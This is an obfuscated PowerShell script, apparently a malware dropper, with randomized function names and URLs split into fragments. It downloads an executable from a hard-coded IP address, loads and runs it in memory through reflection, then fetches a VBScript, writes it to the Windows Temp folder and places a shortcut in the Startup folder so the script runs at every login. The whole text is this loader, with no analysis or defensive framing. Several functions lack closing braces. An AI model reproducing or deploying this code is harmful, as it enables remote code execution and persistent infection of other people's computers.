function JkzYp-FbRq {
Add-Type -AssemblyName System.Net
return New-Object System.Net.WebClient
function WgNrT-VbDl {
$aL = @('http', '://', '185', '.', '39', '.', '17', '.', '70', '/zgrnf/', 'pixel.exe')
return ($aL -join '')
function RmQce-LsXt {
$hP = @('http', '://', '185', '.', '39', '.', '17', '.', '70', '/zgrnf/', 'nums.vbs')
return ($hP -join '')
function OiqPw-YvKe {
param([string]$xU)
$qE = JkzYp-FbRq
return $qE.DownloadData($xU)
function ZdSlj-PxMv {
param([string]$rO)
$zN = JkzYp-FbRq
return $zN.DownloadString($rO)
function KxVoD-EgFt {
param([byte[]]$bK)
return [System.Reflection.Assembly]::Load($bK)
function QzHgn-TdUw {
param([System.Reflection.Assembly]$gJ)
$pL = $gJ.EntryPoint
if ($pL) {
$pL.Invoke($null, @())
function NlCvA-WsQx {
param([string]$mT, [string]$yZ)
[System.IO.File]::WriteAllText($yZ, $mT)
$kI = WgNrT-VbDl
$lE = RmQce-LsXt
$dB = OiqPw-YvKe -xU $kI
$xG = KxVoD-EgFt -bK $dB
QzHgn-TdUw -gJ $xG
$oY = ZdSlj-PxMv -rO $lE
$wJ = "C:\Windows\Temp\nums.vbs"
NlCvA-WsQx -mT $oY -yZ $wJ
$sF = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\App.url"
$vK = "[InternetShortcut]`nURL=file:///$wJ"
[System.IO.File]::WriteAllText($sF, $vK)